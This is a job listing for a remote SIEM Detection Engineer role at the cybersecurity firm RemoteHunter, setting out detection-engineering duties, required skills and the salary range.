RemoteHunterRemote
SIEM Detection Engineer
United States
Full Time
4 days ago
$113,000 - $142,000 USD
H1B Sponsor
Key skills
PythonPowerShellAnalyticsBIPower BIElasticsearchKibanaCommunicationNetwork SecurityFirewall
About this role
RemoteHunter is a cybersecurity organization founded by former National Security Agency cyber operations experts, currently in hyper-growth. The role focuses on building and tuning high-fidelity detections using SIEM data sources to ensure strong coverage across partner environments.
Responsibilities:
- Create, test, and maintain detection logic and rules for new and emerging threats using SIEM telemetry
- Tune alerts to reduce false positives and minimize detection gaps for efficient 24x7 SOC operation
- Build and refine detections using diverse log sources, including firewall, network security, endpoint, identity, cloud, and DNS data
- Collaborate with SOC analysts to identify common patterns and translate them into durable detection content
- Assist in designing dashboards and visualizations for threat trends, detection performance, and customer-specific patterns
- Partner with ingestion and platform teams to troubleshoot parsing, normalization, indexing, and data availability issues
- Build and maintain test environments and validation workflows to verify detections against real-world attacker tactics, techniques, and procedures
- Support incident response by reviewing SOC-mitigated activity and writing detections based on observed tradecraft
- Contribute to enrichment and automation improvements to reduce investigation time and improve analyst decision-making
Requirements:
- Five or more years of experience in an information security role; relevant training or certification may substitute for one year
- Two or more years of experience with system tuning or engineering (SIEM, EDR, logging pipelines, or analytics platforms)
- Strong experience writing SIEM detections and queries (e.g., Elasticsearch/Kibana or similar)
- Familiarity with common network security and firewall logs, including FortiGate, SonicWall, and similar vendor integrations
- Familiarity with schemas such as OCSF
- Working knowledge of Windows threat indicators and attacker behaviors (process execution, persistence, lateral movement, credential access, C2 patterns)
- Knowledge of attacker tools, including legitimate software abused maliciously
- Familiarity with parent/child process relationships and command-line arguments for identifying suspicious activity
- Ability to troubleshoot and debug data ingestion issues like parsing errors, missing fields, and normalization gaps
- Excellent communication skills to summarize findings and present detection rationale and trends
- Ability to work independently with strong problem-solving skills
- Preferred experience in SOC, Threat Hunting, or DFIR
- Experience with log onboarding and integrations (syslog, agents, API-based collection) across MSP stacks
- Basic scripting/automation skills (Python and/or PowerShell) to support enrichment, detection testing, or workflow improvements
- Experience creating Sigma and/or YARA rules and validating against adversary tactics, techniques, and procedures
- Proficiency with Power BI or Kibana dashboards for detection and trend visualization
- Network or System Administration experience
- Relevant certifications such as CRTO or eCPTX
- Deep forensic knowledge of Windows, macOS, or Linux
- Malware analysis experience (behavioral or static)